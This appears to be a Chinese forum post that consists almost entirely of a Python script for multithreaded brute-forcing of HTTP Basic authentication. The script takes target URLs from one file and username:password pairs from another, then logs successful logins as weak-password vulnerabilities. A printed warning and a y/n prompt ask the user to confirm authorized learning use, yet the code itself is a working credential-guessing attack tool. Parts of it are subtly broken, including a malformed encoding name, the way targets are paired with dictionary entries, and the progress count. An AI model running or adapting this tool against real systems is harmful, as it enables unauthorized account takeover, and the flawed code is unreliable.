TA的每日心情 | 慵懒 3 小时前 |
---|
签到天数: 94 天 [LV.6]常住居民II
|
本帖最后由 微尘 于 2025-9-21 20:46 编辑
import requests
import threading
from queue import Queue
import time
from datetime import datetime
import re
# -------------------------- 配置参数(需根据授权场景调整) --------------------------
TARGET_FILE = "目标.txt"
DICT_FILE = "账户密码.txt"
THREAD_NUM = 5
TIMEOUT = 10
# -----------------------------------------------------------------------------------
target_queue = Queue()
dict_queue = Queue()
print_lock = threading.Lock()
stats = {"vuln": 0, "safe": 0, "error": 0, "no_match": 0}
def validate_url(url):
pattern = re.compile(r'^(https?://)?([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}(:\d{1,5})?(/.*)?$')
return re.match(pattern, url) is not None
def load_items(file_path, queue, split_func=None):
try:
with open(file_path, 'r', encoding='utf - 8') as f:
items = [line.strip() for line in f if line.strip()]
if split_func:
items = [split_func(item) for item in items if split_func(item)]
for item in items:
queue.put(item)
print(f'[+] 加载 {queue.qsize()} 个项目')
except FileNotFoundError:
print(f'[-] 文件 {file_path} 不存在')
raise
def verify_auth(target, username, password):
result = {
"target": target, "username": username, "password": password,
"status": "unknown", "message": "", "time": datetime.now().strftime("%Y-%m-%d %H:%M:%S")
}
try:
auth = (username.encode('utf - 8'), password.encode('utf - 8'))
resp = requests.get(target, auth=auth, timeout=TIMEOUT, verify=False)
if resp.status_code == 200:
result["status"] = "vuln"
result["message"] = "弱口令漏洞存在"
elif resp.status_code == 401:
result["status"] = "safe"
result["message"] = "账号密码不匹配"
else:
result["message"] = f'未知状态码 {resp.status_code}'
except requests.exceptions.ConnectTimeout:
result["status"] = "error"
result["message"] = "目标连接超时"
except requests.exceptions.ConnectionError:
result["status"] = "error"
result["message"] = "目标连接失败"
except Exception as e:
result["status"] = "error"
result["message"] = f'未知错误 {str(e)[:30]}...'
return result
def worker():
while not (target_queue.empty() or dict_queue.empty()):
target, (username, password) = target_queue.get(), dict_queue.get()
res = verify_auth(target, username, password)
log_line = f"{res['time']}\t{res['status']}\t{res['target']}\t{res['username']}\t{res['password']}\t{res['message']}\n"
with print_lock:
with open(f'dict_brute_log_{datetime.now().strftime("%Y%m%d%H%M%S")}.txt', 'a', encoding='utf - 8') as f:
f.write(log_line)
status_print = {
"vuln": f'[!] 【漏洞存在】 {res["target"]} | 账号:{username} | 密码:{password}',
"safe": f'[+] 【无漏洞】 {res["target"]} | 账号:{username} | 密码:{password}',
"error": f'[-] 【验证失败】 {res["target"]} | 账号:{username} | 密码:{password} | {res["message"]}',
"no_match": f'[-] 【无匹配】 {res["target"]} | 账号:{username} | 密码:{password} | 字典无匹配密码'
}
print(status_print[res["status"]])
stats[res["status"]] += 1
print(f' 剩余任务:{target_queue.qsize() + dict_queue.qsize() // THREAD_NUM} | 已发现漏洞:{stats["vuln"]}')
target_queue.task_done()
dict_queue.task_done()
def main():
print("=" * 60 + "\n 警告:本工具仅用于授权环境下的学习,禁止未授权使用!\n" + "=" * 60)
if input("\n是否已获得授权并确认用于学习?(y/n):").lower() != "y":
return
print(f' 工具启动于 {datetime.now().strftime("%Y-%m-%d %H:%M:%S")}')
try:
load_items(TARGET_FILE, target_queue)
load_items(DICT_FILE, dict_queue, lambda x: tuple(x.split(':', 1)) if ':' in x else None)
except FileNotFoundError:
return
if target_queue.empty() or dict_queue.empty():
return
start = time.time()
for _ in range(THREAD_NUM):
threading.Thread(target=worker, daemon=True).start()
target_queue.join()
dict_queue.join()
print(f'\n 任务完成 | 耗时 {round(time.time() - start, 2)}s')
print(f' 统计:漏洞 {stats["vuln"]} 个 | 无漏洞 {stats["safe"]} 个 | 失败 {stats["error"]} 个 | 字典无匹配 {stats["no_match"]} 个')
if __name__ == "__main__":
main() |
|